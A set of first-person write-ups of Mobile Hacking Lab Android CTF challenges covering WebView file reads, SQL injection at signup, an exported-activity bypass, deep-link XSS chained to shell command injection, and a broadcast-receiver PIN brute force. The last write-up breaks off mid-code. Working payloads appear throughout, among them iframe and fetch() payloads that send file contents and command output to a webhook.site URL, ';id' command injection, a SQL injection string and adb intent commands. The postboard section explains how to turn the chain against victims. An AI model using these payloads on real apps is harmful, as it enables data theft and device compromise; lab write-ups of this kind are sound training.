The objective was simple:

Find a vulnerability in a markdown parser app and read the flag.txt file from an app sandbox directory.

Initial Recon - JADX

First thing I do with any Android APK is open it in JADX and check the AndroidManifest.xml.

There was only one activity — MainActivity. I was honestly confused at first because MainActivity had basically nothing in it:

protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    ensureFlagFile();
    // ...compose stuff
}

private final void ensureFlagFile() {
    File file = new File(getFilesDir(), "flag.txt");
    if (file.exists()) {
        return;
    }
    FilesKt.writeText$default(file, "dummy", null, 2, null);
}

So it creates a flag.txt with "dummy" if it doesn't exist.

For this challenge, if you are using real device, you will only get dummy flag, you would need to use the MHL lab infrastructure. I spend a couple hours trying to see if I had missed something because I was always getting dummy flag, but when I checked the challenge, it made me feel stupid, it literally says

• Get the real flag.txt from the integrated Android Lab Device from the app data dir.

Anyways,

Finding the Actual Logic

Since it's a Jetpack Compose app, the real logic is scattered across lambdas and composable functions. I went into ComposableSingletons$MainActivityKt and then MainActivityKt which had the hint

A few things stood out immediately:

public static final String markdownToHtml(String str) {
    return "...<body>" + HtmlRenderer.builder()
        .escapeHtml(false)      // <- interesting
        .sanitizeUrls(false)    // <- also interesting
        .build()
        .render(Parser.builder().build().parse(str))
        + "</body></html>";
}

escapeHtml(false) and sanitizeUrls(false) — this means raw HTML in your markdown goes straight to the renderer. No sanitization.

And in the WebView setup:

webView.getSettings().setJavaScriptEnabled(true);
webView.getSettings().setAllowFileAccess(true);
// ...
value.loadDataWithBaseURL("file:///", strMarkdownToHtml, "text/html", "utf-8", null);

JavaScript is enabled, file access is enabled, and the base URL is set to file:///. This is the key piece — loadDataWithBaseURL with file:/// as base means the WebView thinks it's running in a file context, which could allow reading local files.

Attack Plan

The app has three ways to load markdown — From File, From URL, and From Clipboard.

The URL loader only accepts https:// URLs:

java

if (StringsKt.startsWith$default(value, "https://", false, 2, (Object) null)) {
    // loads it
} else {
    Toast.makeText(this.$context, "Only https URLs are allowed", 0).show();
}

So I need to:

1. Host a malicious markdown file with embedded HTML/JS

2. Serve it over HTTPS

3. Load it via the URL dialog

4. Use the injected script to read flag.txt and exfiltrate it

Setting Up the Attack

I spun up a local HTTP server:

bash

python3 -m http.server 8080

And used ngrok to get an HTTPS tunnel since the app enforces https://.

For my initial POC I tried a simple alert:

html

<script>alert(1)</script>

No alert appeared. I spent a bit debugging — turns out the file was loading fine but I had to make sure the content was actually being rendered as HTML and not escaped.

Then I tried a webhook fetch to confirm JS execution:

html

<script>
fetch('https://webhook.site/my-id')
</script>

Got a hit. JS is executing.

Now onto file reading.

Trying to Read the Flag

This is where I went down a rabbit hole. My first instinct was XHR:

var x = new XMLHttpRequest();
x.open('GET', 'file:///data/data/com.mobilehackinglab.markdownpreviewer/files/flag.txt');
x.onload = function() { /* send to webhook */ };
x.send();

I kept getting hits on the webhook but with empty content. Tried sync XHR, tried overrideMimeType, tried different approaches — all empty.

Checked x.status — it was returning 0, meaning the request was being blocked entirely. Even though setAllowFileAccess(true) is set, setAllowUniversalAccessFromFileURLs was NOT set, so cross-origin file reads via XHR were blocked.

The Fix — A very basic Iframe

Instead of XHR, I tried an <iframe>:

html

<iframe 
  src="file:///data/data/com.mobilehackinglab.markdownpreviewer/files/flag.txt"
  onload="new Image().src='https://webhook.site/my-id?f='+btoa(this.contentDocument.body.innerText)">
</iframe>

Since we're in file:/// context (thanks to loadDataWithBaseURL), an iframe pointing to another file:// URL is same-origin. The iframe loads, onload fires, and we grab innerText and ship it to the webhook.

Got the flag!

MHL{f1l3_url5_4r3_n0t_4_bug}

Summary

The vulnerability chain:

1. HTML injection — escapeHtml(false) in the markdown renderer lets you inject raw HTML and <script> tags

2. WebView misconfiguration — setJavaScriptEnabled(true) + setAllowFileAccess(true) + loadDataWithBaseURL("file:///", ...) creates a file-context WebView

3. Same-origin file read via iframe — since base URL is file:///, an iframe can load other file:// paths without triggering CORS

I was a fun challenge. The rabbit hole of XHR vs iframe was the most time consuming part honestly and also that I used real device without reading the challenge intructions, i spent majority of my time on why the flag was dummy.

This is more like a walkthrough of the challenge.

This was the objective from MHL:

• Exploit a SQL Injection Vulnerability: Your mission is to manipulate the signup function in the "Food Store" Android application, allowing you to register as a Pro user, bypassing standard user restrictions.

As soon as I got the apk, I started with JADX and started analyzing the AndroidManifest file

There were 3 activities

 <activity
            android:name="com.mobilehackinglab.foodstore.Signup"
            android:exported="false"/>
        <activity
            android:name="com.mobilehackinglab.foodstore.MainActivity"
            android:exported="true"/>
        <activity
            android:name="com.mobilehackinglab.foodstore.LoginActivity"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>

LoginActivity was the main launcher activity. Because the vulnerability was specified in Signup, I took a closer look at the Signup Activity

There was nothing interesting here, this is just a activity class, all the db related things were happening inside DB helper.

If you see in onCreate of Signup Activity you’ll see

DBHelper dbHelper = new DBHelper(this$0);
// other stuffs
dbHelper.addUser(newUser);

And this was the addUser function inside the DbHelper class

public final void addUser(User user) throws SQLException {
        Intrinsics.checkNotNullParameter(user, "user");
        SQLiteDatabase db = getWritableDatabase();
        byte[] bytes = user.getPassword().getBytes(Charsets.UTF_8);
        Intrinsics.checkNotNullExpressionValue(bytes, "this as java.lang.String).getBytes(charset)");
        String encodedPassword = Base64.encodeToString(bytes, 0);
        String Username = user.getUsername();
        byte[] bytes2 = user.getAddress().getBytes(Charsets.UTF_8);
        Intrinsics.checkNotNullExpressionValue(bytes2, "this as java.lang.String).getBytes(charset)");
        String encodedAddress = Base64.encodeToString(bytes2, 0);
        String sql = "INSERT INTO users (username, password, address, isPro) VALUES ('" + Username + "', '" + encodedPassword + "', '" + encodedAddress + "', 0)";
        db.execSQL(sql);
        db.close();
    }

This line in particular was interesting

String sql = "INSERT INTO users (username, password, address, isPro) VALUES ('" + Username + "', '" + encodedPassword + "', '" + encodedAddress + "', 0)";

It is taking user supplied input directly to SQL statements.

I then started crafting the payload

Payload Creation

Password and Address was being base64 encoded as base64 before inserting into db, while isPro was not user controlled. We are left out with Username.

Let’s use Username to inject SQLi Payload.

You could simplu craft this payload

sqli', 'aGVsbG8=', 'MQ==', 1); --

aGVsbG8= is hello in base64

Why encode password and address before inserting? This is because if you observe

public final User getUserByUsername(String Username) {
        Intrinsics.checkNotNullParameter(Username, "Username");
        SQLiteDatabase db = getReadableDatabase();
        Cursor cursor = db.query("users", new String[]{"id", "username", "password", "address", "isPro"}, "username = ?", new String[]{Username}, null, null, null);
        User user = null;
        if (cursor.moveToFirst()) {
            String encodedPassword = cursor.getString(cursor.getColumnIndexOrThrow("password"));
            String encodedAddress = cursor.getString(cursor.getColumnIndexOrThrow("address"));
            byte[] bArrDecode = Base64.decode(encodedPassword, 0);
            Intrinsics.checkNotNullExpressionValue(bArrDecode, "decode(...)");
            String decodedPassword = new String(bArrDecode, Charsets.UTF_8);
            byte[] bArrDecode2 = Base64.decode(encodedAddress, 0);
            Intrinsics.checkNotNullExpressionValue(bArrDecode2, "decode(...)");
            String decodedAddress = new String(bArrDecode2, Charsets.UTF_8);
            user = new User(cursor.getInt(cursor.getColumnIndexOrThrow("id")), Username, decodedPassword, decodedAddress, cursor.getInt(cursor.getColumnIndexOrThrow("isPro")) == 1);
        }
        cursor.close();
        return user;
    }

Here they decode the base64 to match password and also address, if it is not valid base64 the app will crash, raise an exception hence use valid base64 while inserting into db.

sqli', 'aGVsbG8=', 'MQ==', 1); --This payload is equivalent to saying created sqli user with password hello with isPro as 1.

You can see that in the signup activity, a toast appears when signup is completed

We can also confirm this using objection, that the signup has been successful, we now have user sqli with password hello

SQLite @ /data/data/com.mobilehackinglab.foodstore/databases/userdatabase.db > select * from users;
+----+----------+----------+----------+-------+
| id | username | password | address  | isPro |
+----+----------+----------+----------+-------+
| 1  | admin    | cGFzcw== | YWFhYQ== | 0     |
| 2  | hello    | d29ybGQ= | MQ==     | 0     |
| 3  | hello    | d29ybGQ= | MQ==     | 0     |
| 4  | sqli  | aGVsbG8= | 1        | 1     |
+----+----------+----------+----------+-------+
4 rows in set
Time: 0.001s
SQLite @ /data/data/com.mobilehackinglab.foodstore/databases/userdatabase.db >

Upon login you can observe

We have now bypassed the standard user restrictions and have gotten 10000 credits.

Any more vulnerabilities?

I was checking the manifest and caught my eye

<activity
            android:name="com.mobilehackinglab.foodstore.MainActivity"
            android:exported="true"/>

This mainActivity was exported meaning we can launch it using activity manager

adb shell am start -n com.mobilehackinglab.foodstore/.MainActivity

Starting: Intent { cmp=com.mobilehackinglab.foodstore/.MainActivity }

If you observe the app, you’ll see we are logged in as guest user with 0 credits

Let’s see how they handle Intents here.

Intent Handling in Exported MainActivity

protected void onCreate(Bundle savedInstanceState) {
        // ...
        String username = getIntent().getStringExtra("USERNAME");
        if (username == null) {
            username = "Guest";
        }
        this.userCredit = getIntent().getIntExtra("USER_CREDIT", 0);
        boolean isProUser = getIntent().getBooleanExtra("IS_PRO_USER", false);
        TextView textView = this.nameTextView;
        TextView textView2 = null;
        if (textView == null) {
            Intrinsics.throwUninitializedPropertyAccessException("nameTextView");
            textView = null;
        }
        textView.setText("Guest: " + username);
        TextView textView3 = this.creditsTextView;
        if (textView3 == null) {
            Intrinsics.throwUninitializedPropertyAccessException("creditsTextView");
            textView3 = null;
        }
        textView3.setText("Credits: " + this.userCredit);
        TextView textView4 = this.proUserTextView;
        if (textView4 == null) {
            Intrinsics.throwUninitializedPropertyAccessException("proUserTextView");
        } else {
            textView2 = textView4;
        }
        textView2.setText(isProUser ? "Pro User" : "Regular User");
        String stringExtra = getIntent().getStringExtra("USER_ADDRESS");
        if (stringExtra == null) {
            stringExtra = "Unknown address";
        }
        ///
    }

Interesting they do accept intents USERNAME, USER_CREDIT, IS_PRO_USER, USER_ADDRESS

Exploiting Exported Activity

We can use this to exploit the activity

adb shell am start -n com.mobilehackinglab.foodstore/.MainActivity
 \
∙ --es USERNAME helloworld \
∙ --ei USER_CREDIT 10000 \
∙ --ez IS_PRO_USER true \
∙ --es USER_ADDRESS "deliveryhere"

You can see that we are now logged in as helloworld by exploiting exported activity, bypassing the auth process.

Hence we were able to exploit two vulnerabilities

1. SQL injection in signup

2. Exported MainActivity bypass

Conclusion

This MHL Food Store challenge demonstrated how multiple vulnerabilities can compound to compromise an application's security. We exploited two distinct attack vectors:

SQL Injection in User Registration: By manipulating the username field during signup, we bypassed the isPro restriction through a carefully crafted payload that closed the VALUES clause early and injected our own isPro value. The key insight was ensuring our injected password and address fields used valid base64 encoding to prevent crashes during the subsequent decode operation in getUserByUsername().

Exported Activity Exploitation: The MainActivity's exported status combined with unvalidated Intent extra handling allowed us to completely bypass the authentication flow. By crafting Intent extras with arbitrary USERNAME, USER_CREDIT, and IS_PRO_USER values, we gained full Pro user access without even touching the database.

Key Takeaways

• Always use parameterized queries (PreparedStatements) for SQL operations - the query() method showed the right approach with ? placeholders

• Never mark activities as exported unless absolutely necessary, and always validate Intent data

• Defense in depth matters - fixing just the SQL injection wouldn't have prevented the Intent-based bypass

Both vulnerabilities stemmed from trusting user-controlled input without proper validation. A seemingly simple food ordering app revealed how attack surface expands when multiple security oversights combine.

This was a fascinating challenge from Mobile Hacking Lab that combined web security (XSS) with Android security (command injection). What made it interesting was that it made me thinking about real-world exploitation, not just getting RCE via direct deep links, but weaponizing it through XSS so an attacker could send a malicious link to a victim and exfiltrate the data, Let me walk you through my journey.

Initial Reconnaissance - The Challenge Description

The challenge description immediately pointed to WebView vulnerabilities:

• XSS vulnerability in WebView component

• Exposed Java interface to JavaScript

• Goal: Chain XSS → RCE

My first instinct: This is going to involve addJavascriptInterface.

Decompiling the APK - Finding Entry Points

Started with JADX to examine the AndroidManifest.xml:

<activity android:name=".MainActivity">
    <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="postboard" 
              android:host="postmessage"/>
    </intent-filter>
</activity>

Discovery: Deep link handler - postboard://postmessage/

This meant I could trigger functionality from outside the app via ADB or a malicious link.

I immediately opened something like this to see what happens

The Deep Link Handler - Understanding the Flow

I then started examining MainActivity.handleIntent():

private final void handleIntent() {
    Intent intent = getIntent();
    String action = intent.getAction();
    Uri data = intent.getData();

    if (!Intrinsics.areEqual("android.intent.action.VIEW", action) || 
        data == null || 
        !Intrinsics.areEqual(data.getScheme(), "postboard") || 
        !Intrinsics.areEqual(data.getHost(), "postmessage")) {
        return;
    }

    try {
        String path = data.getPath();
        // Drops the leading '/' character
        byte[] bArrDecode = Base64.decode(
            path != null ? StringsKt.drop(path, 1) : null, 8);
        String message = new String(bArrDecode, Charsets.UTF_8);

        // Single quote escaping
        message = StringsKt.replace$default(message, "'", "\\'", false, 4, null);

        // Loads into WebView
        binding.webView.loadUrl(
            "javascript:WebAppInterface.postMarkdownMessage('" + message + "')");

    } catch (Exception e) {
        // Error path - triggers cowsay
        binding.webView.loadUrl(
            "javascript:WebAppInterface.postCowsayMessage('" + e.getMessage() + "')");
    }
}

Key observations:

1. Path after / is base64 decoded

2. Single quotes are escaped: ' → \'

3. Success path: calls postMarkdownMessage()

4. Error path: calls postCowsayMessage() with exception message

So I could also do

adb shell am start -a android.intent.action.VIEW -d "postboard://postmessage/$(echo -n 'hello' | base64)"

First Approach - The Markdown XSS Hunt

I examined WebAppInterface.postMarkdownMessage() - it had tons of regex replacements converting markdown to HTML:

@JavascriptInterface
public final void postMarkdownMessage(String markdownMessage) {
    // Image: ![alt](url) → <img src='url' alt='alt'/>
    String html3 = new Regex("!\\[(.*?)\\]\\((.*?)\\)")
        .replace(html2, "<img src='$2' alt='$1'/>");

    // Links: [text](url) → <a href='url'>text</a>
    String html13 = new Regex("\\[([^\\[]+)\\]\\(([^)]+)\\)")
        .replace(html12, "<a href='$2'>$1</a>");

    // More markdown parsing...
}

My thinking: If I can inject HTML through markdown syntax, I can get XSS.

Hence I tried with simplest payload

<img src=x onerror=alert(1)>

adb shell am start -a android.intent.action.VIEW -d "postboard://postmessage/PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="

XSS was executed, but what harm would this cause in a real world scenario? likely None

My Initial Instinct - The Cowsay Vector

While everything was focused on the markdown parser, I kept thinking about this code in the assets:

#!/bin/sh
# cowsay.sh

main() {
    if [ "$#" -lt 1 ]; then
        printf "Usage: %s <message>\\n" "$0"
        exit 1
    fi

    message="$*"
    print_message "$message"
    print_cow
}

main "$@"

My thought: This shell script takes user input directly. That's a classic command injection vulnerability.

Looking at how it's called:

public final String runCowsay(String message) {
    String[] command = {"/bin/sh", "-c", 
                       CowsayUtil.scriptPath + ' ' + message};
    Process process = Runtime.getRuntime().exec(command);
    // Read output...
}

Vulnerable! The message is concatenated directly into the shell command.

But here's the issue - postMarkdownMessage() was the primary path, and postCowsayMessage() only triggered on errors.

The Breakthrough - Error Path Exploitation

Remember that exception handler in handleIntent()?

} catch (Exception e) {
    binding.webView.loadUrl(
        "javascript:WebAppInterface.postCowsayMessage('" + e.getMessage() + "')");
}

The key insight: If I send invalid base64, the exception message contains my raw input!

Testing it:

adb shell am start -a android.intent.action.VIEW -d "postboard://postmessage/helloworld;id"

RCE achieved! via command injection in the error path!

The flow:

1. Invalid base64 → Base64.decode() throws exception

2. Exception message = "invalid;id" (our raw input)

3. Catch block calls: postCowsayMessage("invalid;id")

4. Shell executes: /bin/sh -c "cowsay.sh invalid;id"

5. Shell interprets ; → runs cowsay.sh invalid THEN id

Real World Thinking - Why XSS to RCE Matters

At this point, we have two separate vulnerabilities:

1. Direct RCE: postboard://postmessage/invalid;whoami

2. XSS: postboard://postmessage/<base64 encoded HTML>

But here's the problem with #1: It requires the attacker to directly send commands, how would an attacker exfilterate in a real world?

In a real-world scenario:

• Attacker sends malicious deep link to victim

• Victim clicks it (maybe via SMS, email, QR code)

• Attacker wants to exfiltrate data back to their server

Challenge: How do I get the command output back?

Direct command injection via deep link shows output on the device screen, but the attacker can't see it!

Solution: Chain XSS → RCE → Data Exfiltration

Building the Weaponized Payload

The WebView exposes WebAppInterface to JavaScript:

window.WebAppInterface.postCowsayMessage(message)
window.WebAppInterface.getMessages()

My attack chain:

1. Use XSS to call postCowsayMessage() with command injection

2. Wait for command execution to complete

3. Retrieve output via getMessages()

4. Exfiltrate to attacker's webhook

The Network Challenge

Initially thought: "I'll use curl or wget in the shell command to exfil data" This was the same problem with Cyclic Challenge that android busybox doesnt have curl or wget or maybe I am not aware?

~ ❯ adb shell am start -a android.intent.action.VIEW \
  -d "postboard://postmessage/invalid;curl"
Starting: Intent { act=android.intent.action.VIEW dat=postboard://postmessage/invalid }
/system/bin/sh: curl: inaccessible or not found

But wait... The WebView has network access!

JavaScript's fetch() API should works perfectly in WebViews.

Setting Up the Webhook - Data Exfiltration Endpoint

For those unfamiliar with webhooks, let me explain what they are and why we need them in this attack. A webhook is essentially a URL endpoint that receives HTTP requests. Think of it as a mailbox on the internet, whenever someone sends data to that URL, you can see what was sent.

In our attack scenario:

• We're executing commands on the victim's device (like id, ls, cat /data/data/com.app/files/secret.txt)

• The command output appears on the victim's screen, but we (the attacker) can't see it

• We need a way to send that output back to ourselves

webhook.site is free and no signup required, you instantly get a unique URL like: https://webhook.site/d67c482a-84da-4bd2-b5ad-0ec49bdd0670 - Any HTTP request to this URL appears in real-time on the webpage - Perfect for testing and CTF challenges

The Final Payload

<img
  src="x"
  onerror="
    WebAppInterface.postCowsayMessage('x;id');

    setTimeout(function () {
      var m = WebAppInterface.getMessages();
      fetch(
        'https://webhook.site/d67c482a-84da-4bd2-b5ad-0ec49bdd0670?d=' +
        btoa(m)
      );
    }, 2000);
  "
>

Why setTimeout()?

• postCowsayMessage() triggers async shell execution

• Need to wait for command output to be added to cache

• Without delay, getMessages() returns empty/old data

Encoding and Triggering

Base64 encode the payload (I removed extra spaces from the above payload, earlier section was meant to beautify)

Actual payload

<img src=x onerror="WebAppInterface.postCowsayMessage('x;id');setTimeout(function(){var m=WebAppInterface.getMessages();fetch('https://webhook.site/d67c482a-84da-4bd2-b5ad-0ec49bdd0670?d='+btoa(m))},2000)">

PGltZyBzcmM9eCBvbmVycm9yPSJXZWJBcHBJbnRlcmZhY2UucG9zdENvd3NheU1lc3NhZ2UoJ3g7aWQnKTtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7dmFyIG09V2ViQXBwSW50ZXJmYWNlLmdldE1lc3NhZ2VzKCk7ZmV0Y2goJ2h0dHBzOi8vd2ViaG9vay5zaXRlL2Q2N2M0ODJhLTg0ZGEtNGJkMi1iNWFkLTBlYzQ5YmRkMDY3MD9kPScrYnRvYShtKSl9LDIwMDApIj4=

This was the base64 value of the payload, lets send it

Bingo Moment

If you check your webhook, it gets hit, query param d contains some values

https://webhook.site/d67c482a-84da-4bd2-b5ad-0ec49bdd0670?d=WyI8aW1nIHNyYz14IG9uZXJyb3I9XCJXZWJBcHBJbnRlcmZhY2UucG9zdENvd3NheU1lc3NhZ2UoJ3g7aWQnKTtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7dmFyIG09V2ViQXBwSW50ZXJmYWNlLmdldE1lc3NhZ2VzKCk7ZmV0Y2goJ2h0dHBzOlwvXC93ZWJob29rLnNpdGVcL2Q2N2M0ODJhLTg0ZGEtNGJkMi1iNWFkLTBlYzQ5YmRkMDY3MD9kPScrYnRvYShtKSl9LDIwMDApXCI+IiwiPHByZT4gXzxicj4mbHQ7IHggJmd0Ozxicj4gLTxicj4gICAgICAgIFxcICAgXl9fXjxicj4gICAgICAgICBcXCAgKG9vKVxcX19fX19fXzxicj4gICAgICAgICAgICAoX18pXFwgICAgICAgKVxcXC88YnI+ICAgICAgICAgICAgICAgIHx8LS0tLXcgfDxicj4gICAgICAgICAgICAgICAgfHwgICAgIHx8PGJyPnVpZD0xMDM4NSh1MF9hMzg1KSBnaWQ9MTAzODUodTBfYTM4NSkgZ3JvdXBzPTEwMzg1KHUwX2EzODUpLDMwMDMoaW5ldCksOTk5NyhldmVyeWJvZHkpLDIwMzg1KHUwX2EzODVfY2FjaGUpLDUwMzg1KGFsbF9hMzg1KSBjb250ZXh0PXU6cjp1bnRydXN0ZWRfYXBwOnMwOmMxMjksYzI1NyxjNTEyLGM3Njg8YnI+PFwvcHJlPiJd

WyI8aW1nIHNyYz14IG9uZXJyb3I9XCJXZWJBcHBJbnRlcmZhY2UucG9zdENvd3NheU1lc3NhZ2UoJ3g7aWQnKTtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7dmFyIG09V2ViQXBwSW50ZXJmYWNlLmdldE1lc3NhZ2VzKCk7ZmV0Y2goJ2h0dHBzOlwvXC93ZWJob29rLnNpdGVcL2Q2N2M0ODJhLTg0ZGEtNGJkMi1iNWFkLTBlYzQ5YmRkMDY3MD9kPScrYnRvYShtKSl9LDIwMDApXCI+IiwiPHByZT4gXzxicj4mbHQ7IHggJmd0Ozxicj4gLTxicj4gICAgICAgIFxcICAgXl9fXjxicj4gICAgICAgICBcXCAgKG9vKVxcX19fX19fXzxicj4gICAgICAgICAgICAoX18pXFwgICAgICAgKVxcXC88YnI+ICAgICAgICAgICAgICAgIHx8LS0tLXcgfDxicj4gICAgICAgICAgICAgICAgfHwgICAgIHx8PGJyPnVpZD0xMDM4NSh1MF9hMzg1KSBnaWQ9MTAzODUodTBfYTM4NSkgZ3JvdXBzPTEwMzg1KHUwX2EzODUpLDMwMDMoaW5ldCksOTk5NyhldmVyeWJvZHkpLDIwMzg1KHUwX2EzODVfY2FjaGUpLDUwMzg1KGFsbF9hMzg1KSBjb250ZXh0PXU6cjp1bnRydXN0ZWRfYXBwOnMwOmMxMjksYzI1NyxjNTEyLGM3Njg8YnI+PFwvcHJlPiJd

That is in base64, hence lets decode this, you have id executed!

Real World Attack Scenario

Attacker's perspective:

In a realworld postboard social app, you would

1. Craft malicious deep link with XSS payload

2. Send to victim on your own postboard that other’s can see or send payload via other delivery mechanisms such as sms.

3. If this is social postboard victim doesnt even need to click!

4. But if delivery mechanism is SMS then yes victim clicks → App opens → XSS executes

5. JavaScript:

   • Runs arbitrary shell commands

   • Extracts sensitive data (contacts, files, app data)

   • Exfiltrates to attacker's server

6. Victim sees normal app behavior (no visible indicators)

Why this is powerful:

• No user interaction needed

• Bypasses Android's permission model (app's own permissions are used, INTERNET)

• Silent data exfiltration

As an attacker, you should always think, "How would I weaponize this?" Popping up alert(1) on xss doesn’t do any real damage unless you can ex-filtrate.

Disclaimer: While all technical work and problem-solving was done by me, this writeup was edited with assistance from an LLM to improve grammar, clarity, and flow.ShareArtifactsDownload allPostboard

This challenge was part of Mobile Hacking Lab exploiting broadcast receiver, IoT Connect. It was interesting to learn about broadcast receivers, AES encryption weaknesses, Let me walk you through.

Initial Reconnaissance - Manifest Analysis

I started by examining the AndroidManifest.xml to identify the attack surface.

<receiver
    android:name="com.mobilehackinglab.iotconnect.MasterReceiver"
    android:enabled="true"
    android:exported="true">
    <intent-filter>
        <action android:name="MASTER_ON"/>
    </intent-filter>
</receiver>

What I noticed:

• MasterReceiver is exported - accessible from outside the app

• It listens for the MASTER_ON action

• No permission requirements protecting it

This was a clear entry point for external exploitation.

First Attempt - Understanding Broadcast Receivers

I tried triggering the receiver using am broadcast

am broadcast -n "com.mobilehackinglab.iotconnect/.MasterReceiver" --es MASTER_ON "1234"

Nothing happened. I was confused about the proper syntax.

The Fix - Using Intent Actions

The issue was that I was specifying the component name instead of the intent action. Broadcast receivers respond to actions, not component names directly.

Corrected command:

am broadcast -a MASTER_ON --es key "123" -n "com.mobilehackinglab.iotconnect/.MasterReceiver"

Still nothing. I needed to understand what the receiver actually does.

Code Analysis - The Receiver Logic

I started examining the MasterReceiver implementation:

public void onReceive(Context context, Intent intent) {
    if (Intrinsics.areEqual(intent.getAction(), "MASTER_ON")) {
        int key = intent.getIntExtra("key", 0);
        if (context != null) {
            if (Checker.INSTANCE.check_key(key)) {
                CommunicationManager.INSTANCE.turnOnAllDevices(context);
                Toast.makeText(context, "All devices are turned on", 1).show();
            } else {
                Toast.makeText(context, "Wrong PIN!!", 1).show();
            }
        }
    }
}

Key observations:

• The receiver expects an integer extra named key, not a string

• It validates the PIN using Checker.check_key()

• Success triggers turnOnAllDevices()

The Integer Issue

My command was using --es (string extra) instead of --ei (integer extra):

am broadcast -a MASTER_ON --ei key "123" -n "com.mobilehackinglab.iotconnect/.MasterReceiver"

Still no Toast appeared. Why?

The Toast Problem - App Must Be Running

I used to be an android developer in the past and quickly remembered that Toast messages require ui context, an foreground activity to display.

Toast.makeText(context2, "All devices are turned on", 1).show();

The context2 here is the ui context required.

The broadcast receiver works without the app being open, but the Toast won't show. I needed to start the app first:

am start -n com.mobilehackinglab.iotconnect/.LoginActivity

Now when I sent the broadcast:

am broadcast -a MASTER_ON --ei key 123

I saw: "Wrong PIN!!"

The receiver was working. Now I just needed the correct PIN.

Breaking the Encryption - PIN Validation Logic

I examined the Checker class to understand the PIN validation:

public final boolean check_key(int key) {
    try {
        return Intrinsics.areEqual(decrypt(ds, key), "master_on");
    } catch (BadPaddingException e) {
        return false;
    }
}

public final String decrypt(String ds, int key) {
    SecretKeySpec secretKey = generateKey(key);
    Cipher cipher = Cipher.getInstance(algorithm + "/ECB/PKCS5Padding");
    cipher.init(2, secretKey);
    byte[] decryptedBytes = cipher.doFinal(Base64.getDecoder().decode(ds));
    return new String(decryptedBytes, Charsets.UTF_8);
}

private final SecretKeySpec generateKey(int staticKey) {
    byte[] keyBytes = new byte[16];
    byte[] staticKeyBytes = String.valueOf(staticKey).getBytes(Charsets.UTF_8);
    System.arraycopy(staticKeyBytes, 0, keyBytes, 0, 
                     Math.min(staticKeyBytes.length, keyBytes.length));
    return new SecretKeySpec(keyBytes, algorithm);
}

The encryption scheme:

1. The encrypted string is: OSnaALIWUkpOziVAMycaZQ==

2. The PIN is converted to UTF-8 bytes and zero-padded to 16 bytes (AES key size)

3. AES/ECB is used to decrypt the base64-encoded ciphertext

4. If the decrypted value equals "master_on", the PIN is correct

Brute Force Attack - Finding the PIN

Since the PIN is only 000-999, I wrote a Python script to brute force it:

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64

ENCRYPTED_PIN = "OSnaALIWUkpOziVAMycaZQ=="

def generate_secret_key(static_key):
    key_bytes = bytearray(16)
    static_key_bytes = str(static_key).encode('utf-8')
    key_bytes[:len(static_key_bytes)] = static_key_bytes[:16]
    return bytes(key_bytes)

def decrypt_pin(encrypted_pin, secret_key):
    cipher = AES.new(secret_key, AES.MODE_ECB)
    decrypted = cipher.decrypt(base64.b64decode(encrypted_pin))
    return unpad(decrypted, AES.block_size).decode('utf-8')

for i in range(1000):
    pin = f"{i:03d}"
    secret_key = generate_secret_key(pin)
    try:
        decrypted_pin = decrypt_pin(ENCRYPTED_PIN, secret_key)
        if decrypted_pin == "master_on":
            print("PIN found:", pin)
            break
    except (ValueError, KeyError):
        continue

Result: PIN found: 345

Exploitation - Turning On All Devices

Now I had everything I needed:

am start -n com.mobilehackinglab.iotconnect/.LoginActivity && am broadcast -a MASTER_ON --ei key 345

Toast displayed: "All devices are turned on"

Key Takeaways

1. Intent actions vs component names - Broadcast receivers respond to actions in intent filters

2. Data types matter - Using --ei for integers vs --es for strings is critical

3. Toast visibility - Toasts require a foreground activity context to display

4. Weak encryption - Using a small keyspace (3-digit PIN) makes brute force trivial

5. AES key derivation - Simply zero-padding a PIN to 16 bytes is cryptographically weak

Disclaimer: While all technical work and problem-solving was done by me, this writeup was edited with assistance from an LLM to improve grammar, clarity, and flow.

This CTF challenge taught me about command injection through filenames and how unexported Android services can still be vulnerable. Let me walk you through my thought process and the roadblocks I hit.

Initial Reconnaissance - Manifest Analysis

Like always, I started by examining the AndroidManifest.xml file to understand the app's attack surface.

<application
    android:debuggable="true"
    android:allowBackup="true">

    <activity
        android:name="com.mobilehackinglab.cyclicscanner.MainActivity"
        android:exported="true">
        <intent-filter>
            <action android:name="android.intent.action.MAIN"/>
            <category android:name="android.intent.category.LAUNCHER"/>
        </intent-filter>
    </activity>

    <service
        android:name="com.mobilehackinglab.cyclicscanner.scanner.ScanService"
        android:exported="false"/>
</application>

What I noticed:

• MainActivity is exported (accessible from outside)

• ScanService has exported="false" (not directly accessible)

• The app has MANAGE_EXTERNAL_STORAGE permission

I was confused at first. How can I exploit a service that's not exported? I wandered around intents and what not.

The Dead End - MainActivity Analysis

I decompiled the APK and looked at MainActivity to see if it could be a bridge to the unexported service.

private final void setupSwitch() {
    activityMainBinding.serviceSwitch.setOnCheckedChangeListener(
        (compoundButton, isChecked) -> {
            if (isChecked) {
                Toast.makeText(this, "Scan service started...", 0).show();
                startForegroundService(new Intent(this, ScanService.class));
            }
        }
    );
}

The MainActivity just starts the service when a switch is toggled in the UI. It doesn't process any Intent extras from external sources. This was a dead end for getting user-controlled data into the service.

I was stuck here for a while. MainActivity wasn't accepting any external input that could reach ScanService.

The Real Vulnerability - ScanService Code

I shifted focus to ScanService itself to understand what it actually does

@Override
public void handleMessage(Message msg) throws IOException {
    System.out.println("starting file scan...");
    File externalStorageDirectory = Environment.getExternalStorageDirectory();
    Sequence files = FilesKt.walk(externalStorageDirectory);

    for (Object element : files) {
        File file = (File) element;
        if (file.canRead() && file.isFile()) {
            System.out.print(file.getAbsolutePath() + "...");
            boolean safe = ScanEngine.INSTANCE.scanFile(file);
            System.out.println(safe ? "SAFE" : "INFECTED");
        }
    }
    System.out.println("finished file scan!");
}

The service scans all files in /sdcard/ (external storage). I checked what ScanEngine.scanFile() does:

public final boolean scanFile(File file) throws IOException {
    try {
        String command = "toybox sha1sum " + file.getAbsolutePath();
        Process process = new ProcessBuilder()
            .command("sh", "-c", command)
